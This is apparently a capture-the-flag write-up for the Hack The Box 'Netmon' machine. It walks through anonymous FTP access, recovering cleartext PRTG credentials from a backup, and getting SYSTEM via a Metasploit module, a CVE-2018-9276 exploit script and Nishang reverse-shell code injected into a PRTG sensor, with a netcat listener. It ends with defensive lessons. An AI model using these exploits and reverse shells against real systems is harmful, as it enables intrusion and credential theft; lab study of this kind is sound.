Machine Information

Netmon is an easy difficulty Windows box with simple enumeration and exploitation. This box is created by mrb3n. This box takes us to explore FTP to get user flag, and find username and password required to exploit RCE.

Let’s get started!


Strategy to solve

  • As anonymous FTP is enabled and get the user.txt flag directly from the Public user folder
  • There’s a PRTG configuration backup containing an old password that we can download from FTP
  • The PRTG password is the almost the same as the one found in the old backup but it ends with 2019 instead of 2018
  • We can get Meterpreter Session and we can also RCE using Powershell scripts running as sensors in PRTG


Run AutoRecon to enumerate open ports and services running on those ports.

> autorecon

Let’s see the full TCP port scan results.

> cat _full_tcp_nmap.txt
Nmap scan report for
Host is up, received user-set (0.17s latency).
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Indy httpd (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

We can observe that there are 13 ports open:

  • Port 21: running Microsoft ftpd, with Anonymous FTP login allowed
  • Port 80: running Indy httpd (Paessler PRTG bandwidth monitor)
  • Ports 139 & 445: running SMB
  • Ports 135, 49664, 49665, 49666, 49667, 49668 & 49669: running Microsoft Windows RPC
  • Ports 5985 & 47001: running Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)


Getting Free flag from FTP

In the scan report, we found that the FTP server allows anonymous access. After getting access, I quickly found a user.txt flag in the C:\Users\Public folder.

> ftp                                    
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
02-25-19 10:49PM <DIR> Windows
226 Transfer complete.
ftp> pwd
257 "/Users/Public" is current directory.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
> cat user.txt 

Finding user flag was very easy!

But we don’t have access to the the Administrator’s directory.

ftp> pwd
257 "/Users" is current directory.
ftp> cd Administrator
550 Access is denied. 

So, now let’s try something on port 80!

Getting access to PRTG

The PRTG application is running on port 80:

PRTG Network Monitor

It’s running PRTG Network Monitor, which is a network monitoring software, with software version used is Since this is a network monitoring tool, there are chances that it is running with elevated privileges, so if the software contains an RCE, we’ll get a privileged shell.

Since this is an off-the-shelf software, let’s google for default credentials.

Default Credentials

I tried the prtgadmin/prtgadmin credentials but that didn’t work.

On further googling, I found that PRTG stores its configuration files in C:\ProgramData\Paessler. ( Source - Reddit post)

As per the Reddit post, there might be some files that contain clear-text credentials. So, let’s move on to FTP to check if we have access to any such files.

ftp> pwd
257 "/ProgramData/Paessler/PRTG Network Monitor" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-17-21 02:41PM <DIR> Configuration Auto-Backups
02-17-21 07:00PM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
02-18-21 12:00AM <DIR> Logs (Web Server)
02-17-21 07:03PM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
02-18-21 07:29AM 1719684 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.

Let’s download everything starting with PRTG in the directory to our attack machine.

ftp> mget PRTG*

On checking these files, we find credentials in the “PRTG Configuration.old.bak” file.

<!-- User: prtgadmin -->

I tried these credentials on the PRTG login page but it didn’t work. However, as it is a backup file from the year 2018. But according to the dates, the “PRTG Configuration.old” file was last modified or created in 2019 and maybe the admin is lazy and re-used the dbpassword for the admin account and simply used the year 2019.

So let’s try the following password -


My guess was right and we’re in!

Admin Welcome

Now, let’s move on to Exploitation part.

First, we will use Metasploit for exploitation as it is easy, then we will do manual exploitation.


Exploitation #1: Metasploit

Let’s search in Metasploit if there is any module for PRTG.

msf6 > search prtg

Matching Modules

    # Name Disclosure Date Rank Check Description
    - ---- --------------- ---- ----- -----------
    0 exploit/windows/http/prtg_authenticated_rce 2018-06-25 excellent Yes PRTG Network Monitor Authenticated RCE

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/prtg_authenticated_rce

We can see that it is vulnerable to RCE. Let’s use this exploit and set the required things.

  • set ADMIN_PASSWORD to PrTg@dmin2019
  • set RHOSTS to
  • set LHOST to your machine’s tun0 IP
  • run the exploit

Hurray! We got the meterpreter session.

We can get the root flag from Administrator’s directory.

meterpreter > ls
Listing: C:\Users\Administrator\Desktop

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-02-03 17:38:38 +0530 desktop.ini
100666/rw-rw-rw- 33 fil 2019-02-03 10:05:23 +0530 root.txt

meterpreter > cat root.txt

Now, let’s move to manual exploitation.

Exploitation #2: CVE-2018-9276 Python Exploit

For this, I simply searched on google for “prtg network monitor exploit github”. I got this exploit repository.

Simply run the exploit as its help menu says. (This exploit may not work on latest version of Kali Linux) (I have redacted my lhost)

If this exploit doesn’t work then you can use this updated version.

> python --host --port 80 --lhost 10.10.*.* --lport 4444 --user prtgadmin --password PrTg@dmin2019

[+] [PRTG/] is Vulnerable!

[*] Exploiting [] as [prtgadmin/PrTg@dmin2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.*.* LPORT=4444 OUTPUT=/tmp/bhzqmjfi.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 5120 bytes
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.*.*\DKMJUPUZ]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it is still listening on <LHOST>:445!
[-] ps aux | grep <script name> and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.

[+] Listening on [10.10.*.*:4444 for the reverse shell!]
listening on [any] 4444 ...
[*] Incoming connection (,49873)
[*] User NETMON\ authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:IPC$)
connect to [10.10.*.*] from (UNKNOWN) [] 49881
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

nt authority\system
    Volume in drive C has no label.
    Volume Serial Number is 684B-9CE8

    Directory of C:\Users\Administrator\Desktop

02/02/2019 11:35 PM <DIR> .
02/02/2019 11:35 PM <DIR> ..
02/02/2019 11:35 PM 33 root.txt
                1 File(s) 33 bytes
                2 Dir(s) 12,058,755,072 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt

Exploitation #3: Manual Command Injection / RCE through PRTG sensors

PRTG is a monitoring tool that supports a whole suite of sensors, like ping, http, snmp, etc. The server itself has been added in the device list, so it’s safe to assume we can add sensors to it:

PRTG Devices

I clicked add sensor on the server, then selected EXE/Script sensor.


We can’t add Powershell custom scripts because we don’t have write access to the application directory, but we can leverage the Parameters field to add additional code at the end of an existing Powershell script. I used Nishang to get a reverse shell. I added a semi-colon at the beginning of the parameters, then pasted the Nishang code after it.


After the sensor is created, we can start netcat and then we can hit the play button on sensor to execute it.


And finally, we get a shell as nt authority\system.

> nc -lvnp 4444           
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 51985
nt authority\system
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt

Finally, we got the root flag!

Lessons Learned

  • Insecure configuration of FTP server that allowed anonymous login. This allowed us to get access to the system and find cleartext credentials. The administrator should have disabled anonymous access to the FTP server.
  • Cleartext credentials. A backup configuration file of the PRTG network monitoring tool contained cleartext credentials. As we saw in the reddit post, the company had sent its users an email warning them of exposed domain accounts and passwords. The administrator should have complied with the recommendation in the email and deleted the outlined files.
  • Weak authentication credentials. Although we found old credentials that no longer were in use, we simply changed the year in the credentials and were able to access the admin account. The administrator should have used a complex password that would be difficult to crack and does not resemble previously used passwords on the application.

I hope you enjoyed this article and gained some valuable knowledge about RCE. mrb3n did a great job creating this box.

Feel free to contact me for any suggestions and feedbacks. I would really appreciate those.

Thank you for reading!

You can also Buy Me A Coffee if you love the content and want to support this blog page!

Back to Top⮭